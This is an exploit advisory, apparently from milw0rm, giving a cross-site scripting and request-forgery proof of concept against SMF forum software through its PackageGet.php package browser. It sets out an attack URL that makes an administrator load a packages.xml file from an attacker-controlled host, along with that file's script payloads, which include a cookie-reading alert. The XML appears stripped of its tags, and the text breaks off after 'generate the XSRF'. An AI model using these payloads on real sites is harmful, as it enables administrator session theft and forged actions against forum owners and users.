Author: Xianur0
Vulnerable Version: All
The Bug is located in the file: Sources/PackageGet.php
Example:
http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com
When the admin link between the SMF to load the file:
http://attacker.com/packages.xml
Save this file as packages.xml
Xianur0 Was Here
SMF XSS PoC By Xianur0
alert('XSS')]]>
Xianur0:XSMF
SMF PoC By Xianur0
smfexploit.zip
0.1
Xianur0
alert(document.cookie)]]>
and generate the XSRF:
# milw0rm.com [2009-01-26]